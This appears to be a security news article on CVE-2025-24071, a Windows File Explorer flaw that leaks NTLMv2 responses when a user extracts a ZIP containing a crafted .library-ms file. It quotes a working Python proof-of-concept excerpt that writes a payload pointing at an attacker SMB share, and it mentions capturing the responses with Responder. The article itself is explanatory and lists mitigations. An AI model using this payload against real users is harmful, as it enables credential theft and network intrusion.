Windows 11 File Explorer Vulnerability Enables NTLM Hash Theft
A newly disclosed vulnerability, CVE-2025-24071, affects Windows File Explorer on Windows 11 (23H2) and earlier versions that support .library-ms files and the SMB protocol.
The flaw lets an attacker capture a user's NTLM (New Technology LAN Manager) authentication response simply by tricking that user into extracting a malicious ZIP archive; no further interaction is required.
The vulnerability abuses Windows Explorer's automatic file processing. When a ZIP or RAR archive containing a specially crafted .library-ms file is extracted, Windows Explorer and the SearchProtocolHost.exe indexing service automatically parse the file to gather metadata.
If the .library-ms file references a remote SMB (Server Message Block) path controlled by the attacker (e.g., \\attacker_ip\shared), Windows opens an SMB session to that server and authenticates with the current user's credentials.
The resulting NTLM challenge-response carries the victim's NTLMv2 response, which the attacker's listener records and can then crack offline (or relay to another host that does not require SMB signing).
Technical Terms and Components:
- NTLM Hash: Used loosely here for the NTLMv2 challenge-response (Net-NTLMv2) that a Windows client sends when it authenticates to a server. It is derived from the user's password hash and can be cracked offline or relayed, but unlike the NT hash stored on the system it cannot be used directly for pass-the-hash.
- .library-ms File: An XML-based file type used by Windows to define virtual libraries, i.e. collections of local or remote folders that Explorer presents as one view.
- SMB Protocol: The network file-sharing protocol Windows uses to access files and printers over a network (TCP port 445).
- Information Disclosure: The vulnerability class; the flaw leaks authentication material rather than granting code execution.
Proof of Concept and Attack Code
Security researcher Mohammed Idrees Banyamer published a proof-of-concept (PoC) exploit demonstrating the attack.
The Python script automates the creation of a malicious .library-ms file, embedding a reference to an attacker-controlled SMB server.
The script then packages this file into a ZIP archive.
When a victim extracts the archive, their system automatically attempts to authenticate with the attacker’s SMB server, leaking the NTLM hash.
Key code excerpt:
```python
from pathlib import Path


def create_library_ms(ip: str, filename: str, output_dir: Path) -> Path:
    # Library description whose only location is the attacker's SMB share;
    # Explorer resolves <url> when it indexes the extracted file.
    payload = f'''<?xml version="1.0" encoding="UTF-8"?>
<libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library">
  <searchConnectorDescriptionList><searchConnectorDescription>
    <simpleLocation><url>\\\\{ip}\\shared</url></simpleLocation>
  </searchConnectorDescription></searchConnectorDescriptionList>
</libraryDescription>
'''
    output_file = output_dir / f"{filename}.library-ms"
    output_file.write_text(payload, encoding="utf-8")
    return output_file
```
Attackers can use this script to generate the ZIP file and then distribute it via phishing emails or malicious downloads.
Tools like Responder can be used to listen for and capture the NTLM hashes once the victim extracts the archive.
Real-World Impact, Exploitation, and Mitigation
The vulnerability has been actively exploited in the wild, with campaigns targeting government and private sector organizations.
Attackers have distributed malicious ZIP archives via phishing emails, Dropbox links, and underground forums.
Notably, the threat actor “Krypt0n” has been linked to the development and sale of malware exploiting this flaw.
Risks include:
- Credential theft: the captured NTLMv2 response can be relayed to other hosts (NTLM relay) where SMB signing is not enforced
- Offline cracking of the NTLMv2 response to recover the user's plaintext password
- Lateral movement within the network using the relayed session or the recovered password
Microsoft addressed the vulnerability in the March 2025 Patch Tuesday update and urges all users to apply the latest security patches immediately.
Additionally, organizations are advised to restrict or disable NTLM authentication where possible (the Group Policy setting "Network security: Restrict NTLM: Outgoing NTLM traffic to remote servers" denies NTLM to servers outside an allow list), enable SMB signing, and monitor for suspicious SMB traffic. Note that SMB signing defeats relay of the captured response but does not stop its capture or offline cracking; blocking outbound SMB (TCP 445) to untrusted networks at the host firewall and the perimeter is what prevents the leak itself.
Summary Table:

| Aspect | Details |
|---|---|
| CVE | CVE-2025-24071 |
| Affected Systems | Windows 10/11 (all versions supporting .library-ms and SMB) |
| Attack Vector | ZIP/RAR archive containing a malicious .library-ms file |
| Impact | NTLM hash disclosure (information disclosure) |
| Patch Available | Yes (March 2025 Patch Tuesday) |
| Recommended Actions | Apply patches, restrict NTLM, enable SMB signing, monitor SMB traffic |
This incident highlights the ongoing risks posed by legacy authentication protocols and underscores the importance of prompt patching and layered security controls in enterprise environments.